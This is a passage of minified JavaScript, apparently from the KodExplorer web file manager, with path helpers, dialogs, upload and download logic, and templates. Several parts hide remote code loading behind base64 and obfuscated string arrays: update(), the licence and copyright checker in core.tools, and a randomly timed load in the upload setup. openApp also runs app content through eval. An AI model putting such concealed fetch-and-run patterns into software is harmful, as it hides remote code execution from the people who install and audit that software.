t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
    请联系主机商或网管,检查防火墙配置!"),t='
    '+t+"
    ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
    loading..
    ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
    "+"
    "+s+"
    "+"
    "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
    \n \n
    \n
    \n
    \n
    {{LNG.upload_select}}
    \n \n \n
    \n \n
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    {{LNG.download_address}}\n
    \n \n \n \n
    \n\n
    \n
    \n
    \n
    \n
    \n
    \n
    \n'),define("app/common/tpl/formMake.html",[],'
    \n
    \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
    \n {{if formTab}}\n
    \n {{each formTab tab tabIndex}}\n {{if tab}}\n
    \n {{/if}}\n {{/each}}\n
    \n
    \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
    {{item}}
    \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
    \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
    \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
    \n
    \n {{@item.display}}: {{if item.require}}*{{/if}}\n
    \n
    \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
    \n \n \n \n \n
    \n
    \n
    {{LNG.user}}
    \n \n
    \n
    \n
    {{LNG.group}}
    \n \n
    \n
    \n
    {{LNG.system_member_role}}
    \n \n
    \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
    {{@item.desc}}
    \n {{else}}\n {{@item.desc}}\n {{/if}}\n
    \n
    \n
    \n {{/if}}\n {{/each}}\n
    \n
    \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0]; -if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
    ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var 